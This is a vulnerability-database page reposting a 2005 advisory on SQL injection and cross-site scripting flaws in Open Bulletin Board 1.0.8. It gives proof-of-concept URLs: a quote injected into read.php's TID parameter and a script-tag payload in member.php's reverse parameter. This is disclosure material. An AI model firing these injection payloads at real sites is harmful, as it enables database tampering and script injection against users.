Lucene search

openbb108.txt

🗓️ 07 Aug 2005 00:00:00Reported by MegaskyType

packetstorm🔗 packetstormsecurity.com👁 26 Views

Open Bulletin Board has SQL Injection and Cross-Site Scripting vulnerabilities in version 1.0.8.

5 of 5AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

`  
  
Open Bulletin Board   
www.openbb.com  
  
Vulnerable versions: 1.0.8  
  
* OpenBB read.php SQL Injection Vulnerability   
  
Proof of concept:   
http://www.example.com/openbb/read.php?action=lastpost&TID='  
http://www.example.com/openbb/read.php?TID='  
  
  
* OpenBB member.php Cross-Site Scripting Vulnerability  
  
Proof of concept:   
http://www.example.com/member.php?action=list&page=2&sortorder=username&perpage=25&reverse="><script>alert('test');</script>  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

07 Aug 2005 00:00Current

7.4High risk

Vulners AI Score7.4